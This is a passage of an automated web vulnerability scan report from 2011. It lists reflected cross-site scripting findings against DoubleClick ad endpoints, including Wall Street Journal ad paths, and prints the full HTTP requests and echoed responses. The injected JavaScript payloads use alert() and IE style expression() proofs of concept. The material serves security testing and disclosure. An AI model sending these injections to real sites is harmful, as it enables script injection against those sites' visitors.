Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7887

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csdartid%3D5784169940013170");
var
...[SNIP]...

3.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb08b"-alert(1)-"4523e8dc99a was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5More
...[SNIP]...

3.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 862c5"-alert(1)-"b9cec4b80de was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csda
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e7f3"-alert(1)-"8abaf15a711 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:20:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/19f/%2a/c%3B234501632%3B1-0%3B0%3B57841699%3B3454-728/90%3B40013199/40030986/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2Ut
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 was submitted in the !category parameter. This input was echoed as f6345"style="x:expression(alert(1))"760be3c0573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 485

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;f6345"style="x:expression(alert(1))"760be3c0573;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b967b"style%3d"x%3aexpression(alert(1))"43f320cd246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b967b"style="x:expression(alert(1))"43f320cd246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;&b967b"style%3d"x%3aexpression(alert(1))"43f320cd246=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 488

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;&b967b"style="x:expression(alert(1))"43f320cd246=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 was submitted in the !category parameter. This input was echoed as 24f47"style="x:expression(alert(1))"ed49986df20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 604

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;24f47"style="x:expression(alert(1))"ed49986df20;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

3.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad783"style="x:expression(alert(1))"7c9d84b3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;&ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;&ad783"style="x:expression(alert(1))"7c9d84b3db8=1;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

3.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 was submitted in the !category parameter. This input was echoed as 44e25"style="x:expression(alert(1))"92bb3f4bb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 532

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;1-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;44e25"style="x:expression(alert(1))"92bb3f4bb02;~aopt=6/0/ff/0;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

3.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a17"style="x:expression(alert(1))"c28df2770ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;&b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
